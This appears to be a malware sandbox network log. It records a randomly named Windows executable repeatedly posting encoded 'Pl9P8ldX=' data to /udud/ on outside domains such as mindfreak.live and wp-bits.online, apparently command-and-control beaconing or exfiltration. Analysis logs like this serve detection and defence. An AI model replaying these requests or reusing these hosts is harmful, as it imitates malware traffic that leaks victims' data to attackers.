                                                                                                May 27, 2024 12:36:18.388010025 CEST1117INData Raw: 81 7a b7 24 d0 06 9d 37 15 68 ff 96 04 da a0 f3 a6 02 1d dc 92 40 1b 74 de 4c a0 19 67 12 ba ab c0 3f f2 62 32 9a ef ec bc 03 ff aa ea 89 61 90 e4 54 9c 07 03 02 9d 34 41 33 bd ff ce 22 bf a2 56 ab 5f ac 14 7d 02 f2 dd 7d 4e 26 e5 5a d9 4b a0 6e
                                                                                                Data Ascii: z$7h@tLg?b2aT4A3"V_}}N&ZKnTE}iH]""::{stlj*Dh)~i>}.\{ R?POpc`=~w z>OG.{Y;^P_J#;v@hR
                                                                                                May 27, 2024 12:36:18.388137102 CEST1289INData Raw: 31 33 36 63 0d 0a c4 5d 6d 8f e3 b8 91 fe 9c fc 0a 62 1a 07 b4 e6 64 43 92 25 d9 ee c6 05 b7 3b 8b 04 fb e1 ee 80 4c f2 e9 32 18 c8 96 ec 16 c6 6d fb 64 bb 5f d6 e8 ff 7e 55 45 52 a2 28 4a a2 65 6f 32 3d fd 62 aa f8 14 59 2a b2 8a c5 a2 64 72 99
                                                                                                Data Ascii: 136c]mbdC%;L2md_~UER(Jeo2=bY*dr'z~Dxr^9T#.~f|JJoaLM=n9Ckjz!KNA7Xx9dmnr9j({b7W>>:47Ox)_`_sZTIw=
                                                                                                May 27, 2024 12:36:18.388276100 CEST1289INData Raw: 02 33 c9 82 ac 67 26 f7 f1 e4 ee a2 58 94 d5 a3 0e a6 1e 89 18 68 d3 d4 a4 69 ca 3b 89 21 45 c5 eb 6a f6 8e 82 2a fa 47 0e 12 86 61 19 d4 e0 01 96 da a8 7c 54 d3 7b 29 cc 05 46 bd b6 35 2e 76 cf cb 55 14 5c 67 c1 04 b7 0e 43 c3 fe 18 b1 c6 d8 5a
                                                                                                Data Ascii: 3g&Xhi;!Ej*Ga|T{)F5.vU\gCZTlt=pA'lF_\IV@^mkm>/DBZbV@eIHNyC$A)9Xr,?U;EU>G<jbu]1+vaf[xwT7Zz`&+j(5Iy\
                                                                                                May 27, 2024 12:36:18.388391018 CEST1289INData Raw: 55 97 7d a5 e7 4c f0 42 7c ec 0d f6 92 ae 73 e8 2f b8 96 62 f4 e0 12 a0 a5 fe ff fd d7 c6 e7 af ef cf 8b dd 46 eb 07 46 b2 31 75 8e a6 13 bf 39 34 ca eb 81 87 39 73 db 7b 5f ea d5 cb ab ae 30 25 ed 44 d0 4a 1d 9c 74 d0 86 82 36 24 ca a8 83 32 12
                                                                                                Data Ascii: U}LB|s/bFF1u949s{_0%DJt6$2@u Mm<g<"xMe8hfD}glY#@?U?|o,Cg&1cgVw,Cp#uC,y_1mSdv7pnjr"W`"q
                                                                                                May 27, 2024 12:36:18.388509989 CEST1113INData Raw: 68 22 a3 d8 0e 89 13 b7 a3 d8 f6 4f 92 b7 23 d9 f6 4d 92 b7 23 85 97 21 85 ed 48 d1 65 48 91 49 33 c9 9e f5 9f 48 be 81 95 bb 86 89 b5 ed bb 86 49 bf 45 bc 06 dd ce 4e 5e c3 e1 72 eb 79 0d b7 ab 6c ea 0d 19 5b 5b da ab 78 0e b0 bf d7 f0 bb dc 2a
                                                                                                Data Ascii: h"O#M#!HeHI3HIEN^ryl[[x*_b[}-5Zn[{gp}Mxtk}=w!7Nn(!eWnMZ$"\\k1_c}L.-){|>5]\a
                                                                                                May 27, 2024 12:36:18.388662100 CEST1289INData Raw: 62 64 63 0d 0a ec 1d 6b 6f 1b c7 f1 b3 f8 2b 16 5b 34 92 11 f3 8e 47 52 0f 2b 24 93 a6 8d d1 a2 31 52 24 7d 7d 10 20 50 7c 58 67 1f 79 57 1e 29 5a 71 0c a8 89 12 38 b6 d1 a4 80 15 ab 41 64 38 80 fb 08 ea a2 72 ad a6 02 fa f8 41 e2 e9 3f 74 66 76
                                                                                                Data Ascii: bdcko+[4GR+$1R$}} P|XgyW)Zq8Ad8rA?tfvxe6 2vvw3{;anx4QGt0klf!g'4SOC$fegLt;.F*i`&9G~Hi$qR;)yi`'u#,(
                                                                                                May 27, 2024 12:36:18.388788939 CEST1289INData Raw: c7 c9 9e 4e 71 3c 59 d8 02 62 08 28 26 e1 38 75 97 f9 14 5d ce 64 e8 cf 4c ea 9e ed 7e 8a 9e 8d a4 9e ed be e8 79 a6 e4 8c f4 17 9e 2a 80 51 5a 4d 34 f9 c0 38 c4 c3 58 60 c8 ad ba 0d ab c9 a5 71 6a b7 a0 2a c8 1d 8c bd f9 0b c5 a5 92 5e 85 05 d8
                                                                                                Data Ascii: Nq<Yb(&8u]dL~y*QZM48X`qj*^KvnT$C&CnZ,4b)-cLU*#nwk<dQ,Q*s<VvY2l|f2vxEx_gs(w0onX*G6s:j<'nh*y?v;&xX
                                                                                                May 27, 2024 12:36:18.388892889 CEST465INData Raw: 65 27 45 ab 17 72 39 5e f1 3e b9 73 b4 ff 15 d8 25 79 1f 8f 21 74 52 33 6d 3a 9e 2c 4d e4 89 6f be 62 e4 2a 15 35 b8 a1 10 ac 79 8a 2f 5c d9 10 c6 41 f7 91 08 97 aa d2 44 ca d4 a7 f3 a6 0e 64 09 31 80 5e ea 59 27 20 57 d1 db ea 6a 18 70 38 2d 6e
                                                                                                Data Ascii: e'Er9^>s%y!tR3m:,Mob*5y/\ADd1^Y' Wjp8-nppObjX}Ix<TYPBN=F:$Q~g8Q*2_TJ{e!z}q0B|tu8pZH8s5;.>x?~Mrlg
                                                                                                May 27, 2024 12:36:18.391902924 CEST501INData Raw: 31 64 61 0d 0a 7c 5d bd 4e c3 30 10 9e e9 53 1c 62 48 5a b5 c9 03 54 30 40 11 aa d4 8d be 80 db 38 25 55 70 90 93 aa 30 20 b1 b0 33 30 30 c2 1b 74 64 e1 85 a0 bc 03 df 39 ce 4f d3 94 a5 49 dc b3 ef fb 7c 97 e8 64 df 25 cd d4 fa 7c aa 5b ea 59 96
                                                                                                Data Ascii: 1da|]N0SbHZT0@8%Up0 300td9OI|d%|[Y@@]Wli]S'@rj{J7/6LKk8/!CT"4h&L@!.7!v*KT~GWn$8+/ku/RK0NL\DJq\ey_Sr


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                73192.168.11.3049903183.111.161.243807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:36:20.767832041 CEST479OUTGET /udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.grimfilm.co.kr
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:36:21.198863029 CEST475INHTTP/1.1 301 Moved Permanently
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:36:21 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 0
                                                                                                Connection: close
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                X-Redirect-By: WordPress
                                                                                                Location: http://grimfilm.co.kr/udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                74192.168.11.30499043.64.163.50807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:36:26.393095016 CEST745OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.mindfreak.live
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.mindfreak.live
                                                                                                Referer: http://www.mindfreak.live/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 55 43 38 76 66 42 69 72 50 6a 49 6b 6f 62 44 4a 74 64 31 54 69 57 70 35 51 48 53 62 4e 49 30 4a 77 39 36 32 72 4c 52 6b 42 75 67 6f 57 48 30 70 41 33 57 6b 2b 46 79 44 37 52 48 51 45 6d 47 46 6e 6a 78 76 31 76 36 6a 51 78 56 49 63 68 38 6a 47 5a 4d 57 7a 67 4a 58 64 6e 6e 46 73 72 2f 35 68 4b 6b 56 45 4b 32 56 6d 4b 6b 7a 74 62 46 6b 58 34 7a 49 6c 6f 30 73 39 65 5a 48 69 4a 73 42 31 57 78 37 66 6d 5a 6d 4d 41 5a 79 4a 35 41 63 56 47 35 59 61 71 76 6f 59 4e 72 34 42 78 30 65 49 5a 58 59 6a 6d 48 73 6b 62 33 79 50 49 4c 55 4f 51 77 56 61 48 5a 63 50 36 47 39 72 52 30 34 37 77 3d 3d
                                                                                                Data Ascii: Pl9P8ldX=UC8vfBirPjIkobDJtd1TiWp5QHSbNI0Jw962rLRkBugoWH0pA3Wk+FyD7RHQEmGFnjxv1v6jQxVIch8jGZMWzgJXdnnFsr/5hKkVEK2VmKkztbFkX4zIlo0s9eZHiJsB1Wx7fmZmMAZyJ5AcVG5YaqvoYNr4Bx0eIZXYjmHskb3yPILUOQwVaHZcP6G9rR047w==
                                                                                                May 27, 2024 12:36:26.578759909 CEST292INHTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:36:26 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 6e 64 66 72 65 61 6b 2e 6c 69 76 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.mindfreak.live/' />a </head>8</html>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                75192.168.11.30499053.64.163.50807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:36:29.112955093 CEST765OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.mindfreak.live
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.mindfreak.live
                                                                                                Referer: http://www.mindfreak.live/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 55 43 38 76 66 42 69 72 50 6a 49 6b 71 34 4c 4a 76 36 68 54 70 57 70 34 56 48 53 62 66 49 31 68 77 39 6d 32 72 4b 56 30 55 4c 49 6f 58 6d 45 70 52 47 57 6b 75 56 79 44 7a 78 48 56 62 32 47 4f 6e 6a 39 52 31 76 32 6a 51 78 52 49 63 67 73 6a 48 75 67 52 79 77 4a 56 53 48 6e 48 69 4c 2f 35 68 4b 6b 56 45 4b 6a 2b 6d 4b 38 7a 73 72 31 6b 57 61 62 4c 37 59 30 76 30 2b 5a 48 6d 4a 73 46 31 57 78 4a 66 6e 45 4a 4d 47 64 79 4a 38 73 63 56 55 52 5a 54 71 76 79 46 64 71 39 45 52 56 4f 42 64 76 48 6a 55 48 50 73 4c 71 48 4f 66 36 4f 54 54 45 58 4a 6e 6c 78 54 37 72 56 70 54 31 6a 6d 36 79 6f 76 53 6c 58 53 34 43 69 70 50 68 36 78 66 4e 37 66 70 38 3d
                                                                                                Data Ascii: Pl9P8ldX=UC8vfBirPjIkq4LJv6hTpWp4VHSbfI1hw9m2rKV0ULIoXmEpRGWkuVyDzxHVb2GOnj9R1v2jQxRIcgsjHugRywJVSHnHiL/5hKkVEKj+mK8zsr1kWabL7Y0v0+ZHmJsF1WxJfnEJMGdyJ8scVURZTqvyFdq9ERVOBdvHjUHPsLqHOf6OTTEXJnlxT7rVpT1jm6yovSlXS4CipPh6xfN7fp8=
                                                                                                May 27, 2024 12:36:29.299985886 CEST292INHTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:36:29 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 6e 64 66 72 65 61 6b 2e 6c 69 76 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.mindfreak.live/' />a </head>8</html>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                76192.168.11.30499063.64.163.50807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:36:31.832983017 CEST1682OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.mindfreak.live
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.mindfreak.live
                                                                                                Referer: http://www.mindfreak.live/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 55 43 38 76 66 42 69 72 50 6a 49 6b 71 34 4c 4a 76 36 68 54 70 57 70 34 56 48 53 62 66 49 31 68 77 39 6d 32 72 4b 56 30 55 4e 51 6f 57 56 63 70 41 52 69 6b 74 56 79 44 39 52 48 55 62 32 47 54 6e 6a 6c 64 31 75 4b 5a 51 30 4e 49 64 48 73 6a 54 50 67 52 37 77 4a 56 5a 6e 6e 61 73 72 2f 6f 68 4b 55 4a 45 4b 7a 2b 6d 4b 38 7a 73 74 35 6b 66 6f 7a 4c 35 59 30 73 39 65 5a 78 69 4a 73 68 31 57 4a 5a 66 6e 78 32 4d 32 39 79 4a 59 4d 63 54 6e 35 5a 63 71 76 73 45 64 71 62 45 52 59 55 42 64 62 78 6a 55 44 70 73 4c 43 48 4e 72 2f 33 57 69 67 57 56 58 31 68 5a 66 58 4a 70 56 74 51 6b 39 43 52 73 54 68 34 55 36 71 7a 6b 76 39 79 70 74 35 2f 4e 63 57 43 4d 7a 34 45 50 32 69 71 38 2f 6d 6c 6e 41 42 48 6a 4a 66 43 55 46 77 6f 65 4f 35 68 36 56 4e 6b 42 70 70 4c 38 66 6f 70 32 46 6f 54 77 41 6c 41 4e 71 6b 58 66 4c 32 70 6e 47 37 35 41 45 6c 79 35 70 68 4b 61 6c 33 39 6d 37 78 70 4b 66 6e 2b 75 75 6f 69 62 78 69 4a 39 48 56 51 31 37 65 39 77 41 6b 39 77 78 36 6a 78 34 6c 6c 37 41 46 74 61 [TRUNCATED]
                                                                                                Data Ascii: Pl9P8ldX=UC8vfBirPjIkq4LJv6hTpWp4VHSbfI1hw9m2rKV0UNQoWVcpARiktVyD9RHUb2GTnjld1uKZQ0NIdHsjTPgR7wJVZnnasr/ohKUJEKz+mK8zst5kfozL5Y0s9eZxiJsh1WJZfnx2M29yJYMcTn5ZcqvsEdqbERYUBdbxjUDpsLCHNr/3WigWVX1hZfXJpVtQk9CRsTh4U6qzkv9ypt5/NcWCMz4EP2iq8/mlnABHjJfCUFwoeO5h6VNkBppL8fop2FoTwAlANqkXfL2pnG75AEly5phKal39m7xpKfn+uuoibxiJ9HVQ17e9wAk9wx6jx4ll7AFtaww6CUI8lpEH0s0xdgby5jC1FMiMOxc4UT0ber/YeLpSA2bnebQTzThTvEgfGwgNdsk4gLJBb9UneFEbjLAnRSffsztbniBZ63Y7fuHOhL24a/bkcIukW0gCxZfYM37TQYiUD0GwjMlpoE/7Z8hnFTc7m9irp0DW8WQ7nTH5jQGCEZ3UUAmOMMwdfpRcHZN67FUArY7LZmnQbjUsnFhAvUUERJtyaAocXa+zNq2j7JqnL6IDvrxrEgsiR+nO6T50q3fdPhs5IqF9q5tCHbYo86Y5RY86+YTeCpkGxhkbZKkPCdqR2ooDwDYTwwP2lT2PWuwkCkB9Q3PS+HSa1ngP61E3RTHV9R3B6mqayXbd9U2So1N4wz5Jq2J2ifyLBmqiqmCHlm6rD7bAsHuuP7mmUkv0hluMIqet2j6pUkPu38z3vx5V3FCU7xHWyBD1f7WN1XTT2qaDInjJZnKiYpahomMNloryL/A/YydRZ3G1j/Ds0Fvm/ZZ4+smpahMsElXIsavCNzagZyCrhdtgs9VDjiewLiJgQn9P0lw+lUYhmbZg+xdoiNImJ3ITOLDu/9Q1em7xIIjkY+LC7laj3sSIcu8pirflOsdll7gYrjsf4B6plOUJ9YWrTI2WV+6BOPzVGiGDoQbNKzNQaSu0kTpIUz2X6qcwc/RjLsf [TRUNCATED]
                                                                                                May 27, 2024 12:36:32.020076036 CEST292INHTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:36:31 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 6e 64 66 72 65 61 6b 2e 6c 69 76 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.mindfreak.live/' />a </head>8</html>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                77192.168.11.30499073.64.163.50807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:36:34.548211098 CEST479OUTGET /udud/?Pl9P8ldX=ZAUPc22UbAwlmqOcpZtb9jQGZGjNIs5k58OhtZslT+MlZ0MzYVnBwyOCsTvhGHepry8Cy/mecRlkAgE9OO4LtQYiaVzF77nK3tMxOKzIpokQntNvdpDg3pI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.mindfreak.live
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:36:34.733323097 CEST292INHTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:36:34 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 6e 64 66 72 65 61 6b 2e 6c 69 76 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.mindfreak.live/' />a </head>8</html>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                78192.168.11.3049908116.203.164.244807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:36:48.771430016 CEST745OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.wp-bits.online
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.wp-bits.online
                                                                                                Referer: http://www.wp-bits.online/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 41 61 6e 53 6d 53 32 52 61 63 69 6d 41 69 49 38 38 77 72 42 72 67 37 52 6f 76 71 61 48 6c 51 74 63 45 56 68 77 63 63 62 62 45 5a 4f 4c 4a 42 4b 32 62 75 72 54 70 56 47 68 7a 73 47 61 34 67 4b 68 79 52 68 2f 41 39 39 38 42 74 4f 64 70 32 74 37 48 47 4b 6b 36 41 4d 66 4a 64 6c 45 32 70 61 74 4a 7a 68 77 52 78 34 75 75 34 58 38 36 66 50 66 41 6c 45 32 6b 45 4d 4a 54 68 31 61 4e 7a 4c 30 6c 42 70 30 47 6c 36 2f 73 79 73 6e 41 41 50 4f 54 36 55 63 6c 44 33 54 31 65 6e 6b 56 4c 57 54 6a 42 2b 33 71 55 69 72 75 64 73 5a 76 37 30 4a 6b 4f 30 78 32 74 32 6e 52 44 69 4e 7a 48 70 55 77 3d 3d
                                                                                                Data Ascii: Pl9P8ldX=AanSmS2RacimAiI88wrBrg7RovqaHlQtcEVhwccbbEZOLJBK2burTpVGhzsGa4gKhyRh/A998BtOdp2t7HGKk6AMfJdlE2patJzhwRx4uu4X86fPfAlE2kEMJTh1aNzL0lBp0Gl6/sysnAAPOT6UclD3T1enkVLWTjB+3qUirudsZv70JkO0x2t2nRDiNzHpUw==
                                                                                                May 27, 2024 12:36:48.968434095 CEST346INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 27 May 2024 10:36:48 GMT
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Content-Encoding: br
                                                                                                Data Raw: 38 66 0d 0a a1 18 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 74 b3 81 0d 70 38 8c e7 3c 7c ae 4d 8a b1 2b e9 23 92 66 62 94 5d 6a 81 70 41 5a e9 a1 67 c0 a8 71 7b 56 69 d3 a5 0c 31 7d 73 14 43 d3 56 5c 79 30 3f d7 8b 6c 17 21 bc 41 60 04 c4 f7 0f 3a cc b7 68 b1 45 38 e3 2e e6 27 9e 1b 2b ef 8d 1b 2b 13 e2 43 2e 7b 1d e2 6a 7c 9e e0 6a 29 ff fe 8d db fd 03 d9 8a 5f 2f 90 17 94 48 3f b0 81 6a 22 cd 86 09 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 8f [(slytEa$tp8<|M+#fb]jpAZgq{Vi1}sCV\y0?l!A`:hE8.'++C.{j|j)_/H?j"0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                79192.168.11.3049909116.203.164.244807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:36:51.487436056 CEST765OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.wp-bits.online
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.wp-bits.online
                                                                                                Referer: http://www.wp-bits.online/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 41 61 6e 53 6d 53 32 52 61 63 69 6d 42 48 41 38 77 33 48 42 36 41 37 51 6e 50 71 61 65 31 51 54 63 45 4a 68 77 5a 73 4c 62 32 39 4f 4b 6f 78 4b 33 61 75 72 41 5a 56 47 71 54 73 35 55 59 67 52 68 79 63 55 2f 41 78 39 38 42 52 4f 64 73 53 74 37 51 71 4e 6c 71 41 4f 4b 5a 64 6e 4c 57 70 61 74 4a 7a 68 77 52 4e 53 75 76 51 58 38 71 50 50 66 68 6c 48 71 30 45 50 42 7a 68 31 58 74 79 4d 30 6c 41 45 30 43 6c 45 2f 75 61 73 6e 42 77 50 4e 43 36 58 4c 56 44 78 66 6c 66 62 69 58 4b 73 64 68 78 74 33 4c 67 2f 7a 4c 46 75 59 34 4b 75 55 6e 36 32 69 57 52 62 37 51 75 4b 50 78 47 79 4a 32 74 67 46 67 6b 2b 36 64 4b 4b 5a 41 43 72 2f 4c 54 48 41 43 6b 3d
                                                                                                Data Ascii: Pl9P8ldX=AanSmS2RacimBHA8w3HB6A7QnPqae1QTcEJhwZsLb29OKoxK3aurAZVGqTs5UYgRhycU/Ax98BROdsSt7QqNlqAOKZdnLWpatJzhwRNSuvQX8qPPfhlHq0EPBzh1XtyM0lAE0ClE/uasnBwPNC6XLVDxflfbiXKsdhxt3Lg/zLFuY4KuUn62iWRb7QuKPxGyJ2tgFgk+6dKKZACr/LTHACk=
                                                                                                May 27, 2024 12:36:51.684880972 CEST346INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 27 May 2024 10:36:51 GMT
